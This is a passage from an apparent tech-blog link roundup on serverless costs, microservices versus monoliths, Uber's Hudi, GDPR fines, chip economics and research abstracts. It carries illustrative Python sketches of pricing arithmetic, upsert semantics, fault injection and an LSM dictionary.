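The article's three fixes (a shorter timeout, one reused client, and a randomised initial delay) are language-agnostic. Below is a Python sketch of the pattern; the original targets Azure Functions and Service Bus, and `PooledClient`, `shared_client`, and `initial_visibility_delay` are hypothetical names, not Azure SDK calls.

```python
import functools
import random

REQUEST_TIMEOUT_S = 3          # fail early instead of holding a socket for 10 s
MAX_INITIAL_DELAY_S = 60 * 60  # first visibility spread between 0 and 60 minutes


class PooledClient:
    """Hypothetical stand-in for an HTTP or database client that owns a connection pool."""

    def __init__(self, timeout_s: float):
        self.timeout_s = timeout_s


@functools.lru_cache(maxsize=1)
def shared_client() -> PooledClient:
    """Build the client once per process and hand the same instance to every
    execution, a Python analogue of the 'static client' advice."""
    return PooledClient(timeout_s=REQUEST_TIMEOUT_S)


def initial_visibility_delay(rng: random.Random) -> float:
    """Seconds to keep a new queue message invisible, randomised so a large
    batch of messages does not trigger executions all at once."""
    return rng.uniform(0, MAX_INITIAL_DELAY_S)


rng = random.Random(7)
print(shared_client() is shared_client())  # prints: True
print([round(initial_visibility_delay(rng) / 60) for _ in range(3)])  # minutes
```

The jitter trades latency for smoothness: messages wait up to an hour, but connection demand is spread across that hour instead of spiking when a batch lands.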

- WikiLeaks "shared" a map of Amazon's data center locations. It's from 2015, not sure what use it is. A fun bit is an entry that reads "Building is managed by COPT Amazon is known as 'Vandalay Industries' on badges and all correspondence with building manager" Fun because Vandelay Industries is an homage to Seinfeld.

- The early days of a new industry are exciting. Everything is possibility and opportunity. Then the winners emerge and the losers must become philosophical or go mad. Kubernetes won, and that’s OK. Cloud Foundry into the future

- Is Serverless shaming a thing? #AWS Lambda functions can now run for up to 15 minutes. This prompted a good discussion about how you would use that and whether it would be more expensive than EC2. It also surfaced the idea that serverless is associated with lower skill levels: "Wayne have you been able to calculate the costs of running Lambda’s for such long periods? I imagine you’ll find it’s several times more expensive than EC2, ECS, EKS. Are these other technologies just that inadequate for your needs? Or just not strong enough infra chops in house?"
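A back-of-the-envelope way to frame that cost question: price a 1 GB function that is kept busy around the clock with back-to-back 15-minute invocations. The prices below are assumptions: the long-standing us-east-1 Lambda rates, with the free tier ignored. Check them against the current price list. The result is an hourly figure you can compare with whatever instance you would otherwise run.

```python
# Assumed Lambda prices (us-east-1 list prices of the era; free tier ignored).
PRICE_PER_GB_SECOND = 0.0000166667
PRICE_PER_MILLION_REQUESTS = 0.20


def lambda_monthly_cost(memory_gb: float, invocation_seconds: int, days: int = 30) -> float:
    """Cost of keeping one function busy 24/7 with back-to-back invocations."""
    busy_seconds = days * 24 * 3600
    invocations = busy_seconds / invocation_seconds
    compute = busy_seconds * memory_gb * PRICE_PER_GB_SECOND
    requests = invocations / 1_000_000 * PRICE_PER_MILLION_REQUESTS
    return compute + requests


cost = lambda_monthly_cost(memory_gb=1.0, invocation_seconds=15 * 60)
print(round(cost, 2))              # 43.2 dollars per month
print(round(cost / (30 * 24), 3))  # 0.06 dollars per hour for 1 GB of always-on Lambda
```

At these rates, the per-request fee is negligible for long invocations. The comparison comes down to roughly $0.06 per GB-hour against an instance's hourly price.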

- Nicely done. The Illustrated TLS Connection.

- Triangulation 368: Nicole Lazzaro. The 4 Fun Keys create games’ four most important emotions: 1. Hard Fun: Fiero, an in-the-moment personal triumph over adversity; 2. Easy Fun: Curiosity; 3. Serious Fun: Relaxation and excitement; 4. People Fun: Amusement.

- Is 100 petabytes big data anymore? Remember when a petabyte was a back breaker? Now we can seriously argue if 100 of them is big data. Uber’s Big Data Platform: 100+ Petabytes with Minute Latency. It evolved from a system built on Vertica. The problem: it was expensive, and working with JSON was hard. Then came Hadoop. The problem: "With over 100 petabytes of data in HDFS, 100,000 vcores in our compute cluster, 100,000 Presto queries per day, 10,000 Spark jobs per day, and 20,000 Hive queries per day, our Hadoop analytics architecture was hitting scalability limitations and many services were affected by high data latency." The solution: Hudi (Hadoop Upserts anD Incremental), an open source Spark library that provides an abstraction layer on top of HDFS and Parquet to support the required update and delete operations. Hudi can be used from any Spark job, is horizontally scalable, and only relies on HDFS to operate. Also, Lessons from building VeniceDB.
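To make "upserts and incrementals" concrete, here is a toy, in-memory sketch of the semantics. It is not Hudi's API and it does not touch Parquet or HDFS. Updates are merged into a base set of records by key, with a timestamp deciding which version wins. Deletes are applied, and an incremental query returns only records changed after a checkpoint. The field names `id`, `updated_at`, and `_deleted` are hypothetical.

```python
from typing import Dict, List

Record = Dict[str, object]


def upsert(base: List[Record], updates: List[Record],
           key: str = "id", ts: str = "updated_at") -> List[Record]:
    """Copy-on-write style merge: produce a new 'file' with updates applied.

    Records are matched on `key`; the version with the newer `ts` wins.
    Records flagged `_deleted` are dropped from the output.
    """
    merged: Dict[object, Record] = {r[key]: r for r in base}
    for rec in updates:
        current = merged.get(rec[key])
        if current is None or rec[ts] >= current[ts]:
            merged[rec[key]] = rec
    live = [r for r in merged.values() if not r.get("_deleted")]
    return sorted(live, key=lambda r: r[key])


def incremental(records: List[Record], since: int, ts: str = "updated_at") -> List[Record]:
    """Return only records changed after the `since` checkpoint."""
    return [r for r in records if r[ts] > since]


base = [{"id": 1, "fare": 10, "updated_at": 1}, {"id": 2, "fare": 7, "updated_at": 1}]
updates = [
    {"id": 1, "fare": 12, "updated_at": 2},         # update
    {"id": 2, "updated_at": 3, "_deleted": True},   # delete
    {"id": 3, "fare": 5, "updated_at": 2},          # insert
]
result = upsert(base, updates)
print(result)
print(incremental(result, since=1))
```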

- This pretty much sums up the programming life. Now that Google+ has been shuttered, I should air my dirty laundry on how awful the project and exec team was. Here's a pernicious idea I wish people could move beyond: "I wanted this job so badly. I wanted to prove I was worthy." This idea that your self-worth is dependent on being hired by a certain company is childish and self-defeating. Don't fall for the psyops ploy of belonging. You're better than that.

- @jcoplien: "If coding doesn't feel like painting or passionate creative writing, you have at least another level to master before calling yourself a programmer." The irony is that for most professional writers, writing is about putting your butt in the chair, every day, and doing the work. It's not about inspiration or creativity. A lot like programming. As a professional you don't have the luxury of writer's block. You write...because it's work. You code...because it's work. Writing and programming share a deep underlying similarity and neither is as romantic as the public image might suggest.

- The Next Big Chip Companies: Moving from a big hit market to a niche market. Moved away from a single device that's going to sell 100 million units. Entering a world with thousands of designs that sell 100,000 units. Need to start relying on open source hardware like RISC-V to lower the cost basis. Also need to change the supply chain away from producing one end product based on expensive products. Need configurability. Takes away the driver for the semiconductor boom and bust cycle. You don't have big pools of inventory that must match demand. Open source + configurability enables new business models and changes the economics. Semiconductors are now designed to be part of a solution. Can lower cost basis and reduce market risk, so we should see a renaissance in semiconductor investment. Automotive, VR & AR, medical, cloud, IoT: every industry is impacted. This is the golden age for semiconductors.

- Why did Medium switch to a Microservice architecture now? Their Node.js monolithic app became a bottleneck. Tasks that are computationally heavy and I/O heavy are not a good fit for Node.js. It slows down product development. Since all the engineers build features in the single app, features are often tightly coupled. Engineers are also afraid of making big changes because the impact is too big and sometimes hard to predict. The monolithic app makes it difficult to scale up the system for particular tasks or isolate resource concerns for different types of tasks. It prevents trying out new technology. One major advantage of the microservice architecture is that each service can be built with different tech stacks and integrated with different technologies.

- Indeed, Well Architected Monoliths are Okay. There's an assumption monoliths entail Big Ball of Mudness. Not so. Internally the structure of a process is the same as a distributed application. As above so below. Code is divided into components that communicate over messages and have their own threading contexts. At the highest levels that exact same code can be compiled together in one binary or pulled apart into separate programs and distributed throughout a cluster. This is what Medium did not do.
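Here is a minimal sketch of that idea, using hypothetical component names: each component owns a thread and an inbox, and it only talks to others through `send`. In this sketch the transport is an in-process queue. Splitting a component into its own service would mean replacing `send` with a network call, while the handlers stay unchanged.

```python
import queue
import threading


class Component:
    """A component with its own thread; it talks to others only via messages."""

    def __init__(self, name, handler):
        self.name = name
        self.inbox = queue.Queue()
        self._handler = handler
        self._thread = threading.Thread(target=self._run, daemon=True)

    def start(self):
        self._thread.start()

    def send(self, msg):
        # In-process transport; a distributed build could put an RPC call here.
        self.inbox.put(msg)

    def _run(self):
        while True:
            msg = self.inbox.get()
            if msg is None:  # shutdown sentinel
                break
            self._handler(msg)

    def stop(self):
        # FIFO inbox: everything sent before the sentinel is handled first.
        self.inbox.put(None)
        self._thread.join()


results = []
billing = Component("billing", lambda order: results.append(f"billed {order}"))
orders = Component("orders", lambda order: billing.send(order.upper()))
billing.start()
orders.start()
for o in ["a", "b", "c"]:
    orders.send(o)
orders.stop()   # drains orders first, so all forwards reach billing's inbox
billing.stop()
print(results)  # ['billed A', 'billed B', 'billed C']
```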

- Do you need to test in production?: The act of sabotaging parts of your system/availability may sound crazy to some people. But it puts a very firm commitment in place. You should be ready for these faults, as they will happen on one of these Thursdays. It establishes a discipline that you would test, gets you prepared with writing the instrumentation for observability, and toughens you up. It puts you into a useful paranoid mindset: the enemy is always at bay and never sleeps, I should be ready to face attacks. (Hmm, here is an army analogy: should you train with live ammunition? It is still controversial because of the lives on the line.) Why not wait till faults occur in production by themselves? They will happen anyways. But when you do chaos testing, you have control over the inputs/failures, so you already know the root cause. And this can give you a much better opportunity to observe the percolation effects.
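The point about knowing the root cause can be shown with a small fault-injection wrapper. This is a sketch under stated assumptions, not any particular chaos tool. A seeded RNG decides which calls to a hypothetical dependency fail. The injected error subclasses `ConnectionError`, so the code under test handles it exactly as it would handle a real network failure.

```python
import random


class InjectedFault(ConnectionError):
    """A deliberate failure that looks like a real network error to callers."""


def chaos(call, failure_rate, rng):
    """Wrap `call` so that roughly `failure_rate` of invocations fail on purpose."""
    def wrapped(*args, **kwargs):
        if rng.random() < failure_rate:
            raise InjectedFault(f"injected failure in {call.__name__}")
        return call(*args, **kwargs)
    return wrapped


def fetch_profile(user_id):
    # Hypothetical downstream dependency.
    return {"id": user_id}


def get_profile(fetch, user_id):
    # Behaviour under test: degrade gracefully when the dependency fails.
    try:
        return fetch(user_id)
    except ConnectionError:
        return {"id": user_id, "degraded": True}


rng = random.Random(7)  # seeded, so the experiment can be replayed exactly
flaky_fetch = chaos(fetch_profile, failure_rate=0.3, rng=rng)
responses = [get_profile(flaky_fetch, i) for i in range(1000)]
degraded = sum(1 for r in responses if r.get("degraded"))
print(degraded)  # roughly 30% of calls degraded, yet every request got an answer
```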

- KotlinConf 2018 – Recap: One of Andrey Breslav’s main points of emphasis during the opening keynote was that Kotlin is not limited to Android development. More than 40% of attendees were indeed using Kotlin for backend development, and more than 30% for web development.

- Lambda looks to be a loss leader, tempting you in, so you can pay higher prices for ecosystem integrations. Pricing pitfalls in AWS Lambda: Besides the Lambda functions, it’s also very important to take into account the cost of the event sources...An API Gateway that receives a constant rate of 1000 requests/s would cost around $9,000 per month, plus the cost of Lambda invocations, CloudWatch Logs and data transfers...AWS Step Functions is another service that, whilst it delivers a lot of value, can be really pricey when used at scale. At $25 per million state transitions, it’s one of the most expensive services in AWS...Aside from APIs, Lambda is often used in conjunction with SNS, SQS or Kinesis to perform background processing. SNS and SQS are both charged by requests only, whereas Kinesis charges for shard hours on top of PUT requests...Another often overlooked cost of using Lambda lies with the services you use to monitor your functions. CloudWatch Logs for instance...Finally, you should also consider the cost of data transfer for Lambda. Data transfers are charged at the standard EC2 rate.
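The $9,000 figure can be reproduced with simple arithmetic. The sketch below assumes a flat API Gateway price of $3.50 per million requests and a 30-day month. That price is an assumption; volume tiers, if they apply, would lower the total. The Step Functions rate of $25 per million transitions comes from the quoted article. The Step Functions workload (10 executions/s, 5 transitions each) is hypothetical.

```python
SECONDS_PER_MONTH = 30 * 24 * 3600

API_GATEWAY_PER_MILLION = 3.50      # assumed flat request price
STEP_FUNCTIONS_PER_MILLION = 25.00  # from the article: $25 per million state transitions


def monthly_events(rate_per_second: float) -> float:
    return rate_per_second * SECONDS_PER_MONTH


def api_gateway_cost(requests_per_second: float) -> float:
    return monthly_events(requests_per_second) / 1e6 * API_GATEWAY_PER_MILLION


def step_functions_cost(executions_per_second: float, transitions_per_execution: int) -> float:
    transitions = monthly_events(executions_per_second) * transitions_per_execution
    return transitions / 1e6 * STEP_FUNCTIONS_PER_MILLION


print(round(api_gateway_cost(1000)))      # 9072, i.e. "around $9,000 per month"
print(round(step_functions_cost(10, 5)))  # 3240 for a modest hypothetical workflow
```

Neither figure includes the Lambda invocations themselves. Those come on top, along with logs and data transfer.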

- Doubling Down On What You Love And Opportunities When Publishing Wide. My NINC 2018 Round-up. The internet has radically changed how content is produced and sold. It used to be that publishing a book a year was a good pace. Then with digital distribution through Kindle Unlimited, getting paid per page read incented authors to start releasing several books a year. Then the pace increased to a book per month. Now author collectives are releasing a book a day. This is made possible by internet distribution, bundling economics, digital readers, digital purchasing, and Amazon's two-sided online marketplace. Lesson: you can't compete on speed or quantity; you need to compete on brand. Another trend is "audio first." Software has gone mobile first. Authors are finding higher profits with their audio books. It appears people like listening more than reading. We may see "books" switch to audio first with the book as a secondary product.

- The pinnacle of modern technology. Indistinguishable From Magic: Manufacturing Modern Computer Chips.

- Microservices Are Something You Grow Into, Not Begin With: In the end, it's absolutely the case that a movement to microservices is something that should be evolutionary, and in direct response to technical requirements. adamdrake: Most of the time, I've found a push to microservices within an organization to be due to some combination of: 1) Business is pressuring tech teams to deliver faster, and they cannot, so they blame current system (derogatory name: monolith) and present microservices as solution...2) Inexperienced developers proposing microservices because they think it sounds much more fun than working on the system as it is currently designed...3) Technical people trying to avoid addressing the lack of communication and leadership in the organization by implementing technical solutions...4) Inexperienced developers not understanding the immense costs of coordination/operations/administration that come along with a microservices architecture...5) Some people read about microservices on the engineering blog of one of the major tech companies, and those people are unaware that such blogs are a recruiting tool of said company.

- FDP or Fine Driven Programming will become more of a thing. Programmers have long been held unaccountable for their bugs and design flaws. What if that has ended? In the wake of a private data leak of hundreds of thousands of users, Google decided to shut down Google+. That's partly because it doesn't fit Google's strategic vision anymore, but it's also because in this age of GDPR Google+ is a huge open liability that doesn't balance out the books. Fines can be costly. Facebook is facing a potential fine of $1.63bn. GDPR: Google and Facebook face up to $9.3B in fines on first day of new privacy law. Will this reduce innovation? Part of me says no, because you should make your software secure rather than ignoring security as a design constraint as the industry has for decades. But those are big fines. Would you want to take that risk with your new venture? Programming is inherently buggy. Mistakes get made no matter how careful you are. What if that mistake could cost you everything? In the past that wasn't an issue. Innovation happens at the edge of chaos. Rules try to hold back the chaotic tide. Now you have to think long and hard about what risks you are willing to take. Also, Study: Google is the biggest beneficiary of the GDPR

- Joint report on publicly available hacking tools: In it we highlight the use of five publicly-available tools, observed in recent cyber incidents around the world. To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.

- apple/swift-nio: Event-driven network application framework for high performance protocol servers & clients, non-blocking.

- facebookincubator/StateService (article): a state-machine-as-a-service that solves the problem of coordinating tasks that must occur in a sequence on one or more machines.
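A hedged illustration of the idea, not StateService's actual API: a central service records which step each machine is on. It accepts a completion report only for that machine's current step, so no machine can skip ahead in the sequence. The step names and the `ToyStateService` class are hypothetical.

```python
from enum import Enum


class Step(Enum):
    DRAIN = "drain"
    UPGRADE = "upgrade"
    VERIFY = "verify"
    UNDRAIN = "undrain"
    DONE = "done"


# The only legal transitions: each step is followed by exactly one next step.
NEXT = {
    Step.DRAIN: Step.UPGRADE,
    Step.UPGRADE: Step.VERIFY,
    Step.VERIFY: Step.UNDRAIN,
    Step.UNDRAIN: Step.DONE,
}


class ToyStateService:
    """Central record of which step each machine is on (hypothetical API)."""

    def __init__(self, machines):
        self.state = {m: Step.DRAIN for m in machines}

    def report_done(self, machine, step):
        current = self.state[machine]
        if current is Step.DONE or step is not current:
            raise ValueError(f"{machine}: cannot finish {step.value} while at {current.value}")
        self.state[machine] = NEXT[current]
        return self.state[machine]


svc = ToyStateService(["host-a", "host-b"])
for step in [Step.DRAIN, Step.UPGRADE, Step.VERIFY, Step.UNDRAIN]:
    svc.report_done("host-a", step)
print(svc.state["host-a"])  # Step.DONE
try:
    svc.report_done("host-b", Step.VERIFY)  # host-b has not drained yet
except ValueError as err:
    print(err)  # host-b: cannot finish verify while at drain
```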

- Competing with complementors: An empirical look at Amazon.com: we find that Amazon is more likely to target successful product spaces. We also find that Amazon is less likely to enter product spaces that require greater seller efforts to grow, suggesting that complementors' platform‐specific investments influence platform owners' entry decisions. While Amazon's entry discourages affected third‐party sellers from subsequently pursuing growth on the platform, it increases product demand and reduces shipping costs for consumers.

- Neural Adaptive Content-aware Internet Video Delivery: Our evaluation using 3G and broadband network traces shows the proposed system outperforms the current state of the art, enhancing the average QoE by 43.08% using the same bandwidth budget or saving 17.13% of bandwidth while providing the same user QoE.

- Classical Verification of Quantum Computations: We present the first protocol allowing a classical computer to interactively verify the result of an efficient quantum computation. We achieve this by constructing a measurement protocol, which enables a classical verifier to use a quantum prover as a trusted measurement device. The protocol forces the prover to behave as follows: the prover must construct an n qubit state of his choice, measure each qubit in the Hadamard or standard basis as directed by the verifier, and report the measurement results to the verifier. The soundness of this protocol is enforced based on the assumption that the learning with errors problem is computationally intractable for efficient quantum machines.

- Quantum Artificial Life in an IBM Quantum Computer: We present the first experimental realization of a quantum artificial life algorithm in a quantum computer. The quantum biomimetic protocol encodes tailored quantum behaviors belonging to living systems, namely, self-replication, mutation, interaction between individuals, and death, into the cloud quantum computer IBM ibmqx4. In this experiment, entanglement spreads throughout generations of individuals, where genuine quantum information features are inherited through genealogical networks. As a pioneering proof-of-principle, experimental data fits the ideal model with accuracy. Thereafter, these and other models of quantum artificial life, for which no classical device may predict its quantum supremacy evolution, can be further explored in novel generations of quantum computers. Quantum biomimetics, quantum machine learning, and quantum artificial intelligence will move forward hand in hand through more elaborate levels of quantum complexity.

- GPU LSM: A Dynamic Dictionary Data Structure for the GPU: We develop a dynamic dictionary data structure for the GPU, supporting fast insertions and deletions, based on the Log Structured Merge tree (LSM). Our implementation on an NVIDIA K40c GPU has an average update (insertion or deletion) rate of 225 M elements/s, 13.5x faster than merging items into a sorted array. The GPU LSM supports the retrieval operations of lookup, count, and range query operations with an average rate of 75 M, 32 M and 23 M queries/s respectively. The trade-off for the dynamic updates is that the sorted array is almost twice as fast on retrievals. We believe that our GPU LSM is the first dynamic general-purpose dictionary data structure for the GPU.
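For intuition about the LSM structure, here is a sequential, CPU-side toy in Python. It is not the paper's GPU implementation. Updates arrive in fixed-size batches and become sorted runs. Runs are merged like a binary counter, so level i holds either nothing or `batch_size * 2**i` entries. Deletions are tombstones, and lookups scan from the newest level down. The batch size and names are illustrative assumptions.

```python
import bisect
import heapq


class ToyLSM:
    """Levels of sorted runs; level i is empty or holds batch_size * 2**i entries."""

    def __init__(self, batch_size=4):
        self.batch_size = batch_size
        self.levels = []  # each entry: None or a sorted list of (key, -seq, value)
        self.seq = 0      # global update counter; larger means newer

    def update_batch(self, batch):
        """Apply a batch of (key, value) pairs; a value of None is a delete (tombstone)."""
        if len(batch) != self.batch_size:
            raise ValueError("updates must arrive in fixed-size batches")
        run = []
        for key, value in batch:
            self.seq += 1
            run.append((key, -self.seq, value))  # -seq sorts the newest version first
        run.sort()
        # Binary-counter merging: carry the run upward while levels are occupied.
        level = 0
        while level < len(self.levels) and self.levels[level] is not None:
            run = list(heapq.merge(run, self.levels[level]))
            self.levels[level] = None
            level += 1
        if level == len(self.levels):
            self.levels.append(None)
        self.levels[level] = run

    def lookup(self, key):
        for run in self.levels:  # lower levels always hold newer data
            if run is None:
                continue
            i = bisect.bisect_left(run, (key,))
            if i < len(run) and run[i][0] == key:
                return run[i][2]  # newest version; None if it was deleted
        return None


lsm = ToyLSM(batch_size=2)
lsm.update_batch([(5, "a"), (1, "b")])
lsm.update_batch([(5, "c"), (9, "d")])   # merges with level 0 into level 1
lsm.update_batch([(1, None), (7, "e")])  # lands in the now-empty level 0
print(lsm.lookup(5), lsm.lookup(1), lsm.lookup(7))  # c None e
```

Keeping stale versions and tombstones inside the runs preserves the fixed level sizes. The trade-off is that lookups must check levels in order, which fits the paper's note that a plain sorted array is faster for retrievals.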

- Data-Oriented Design: Data-oriented design has been around for decades in one form or another but was only officially given a name by Noel Llopis in his September 2009 article of the same name.
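A common first illustration of data-oriented design is switching from an array of structures to a structure of arrays. In the second layout, a hot loop streams through only the fields it needs. The sketch below shows both layouts with a hypothetical particle update. In Python, interpreter overhead hides most of the cache benefit, so treat this as a picture of the data layout. In C, C++, or with NumPy arrays, the layout is where the payoff shows up.

```python
from array import array
from dataclasses import dataclass


# Array-of-structures: one object per particle, all fields bundled together,
# so the update loop drags `name` along even though it never reads it.
@dataclass
class Particle:
    x: float
    vx: float
    name: str


def step_aos(particles, dt):
    for p in particles:
        p.x += p.vx * dt


# Structure-of-arrays: one contiguous array per field.
class Particles:
    def __init__(self, xs, vxs, names):
        self.x = array("d", xs)
        self.vx = array("d", vxs)
        self.names = list(names)  # cold data kept out of the hot arrays

    def step(self, dt):
        # Touches only the two arrays the update needs.
        for i in range(len(self.x)):
            self.x[i] += self.vx[i] * dt


aos = [Particle(0.0, 1.0, "p0"), Particle(10.0, -2.0, "p1")]
step_aos(aos, 0.5)
soa = Particles([0.0, 10.0], [1.0, -2.0], ["p0", "p1"])
soa.step(0.5)
print([p.x for p in aos], list(soa.x))  # [0.5, 9.0] [0.5, 9.0]
```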

- Service Fabric: A Distributed Platform for Building Microservices in the Cloud: We describe Service Fabric (SF), Microsoft’s distributed platform for building, running, and maintaining microservice applications in the cloud. SF has been running in production for 10+ years, powering many critical services at Microsoft. This paper outlines key design philosophies in SF. We then adopt a bottom-up approach to describe low-level components in its architecture, focusing on modular use and support for strong semantics like fault-tolerance and consistency within each component of SF. We discuss lessons learned, and present experimental results from production data.

- Wi-Fi Backscatter: Internet Connectivity for RF-Powered Devices: We present Wi-Fi Backscatter, a novel communication system that bridges RF-powered devices with the Internet. Specifically, we show that it is possible to reuse existing Wi-Fi infrastructure to provide Internet connectivity to RF-powered devices.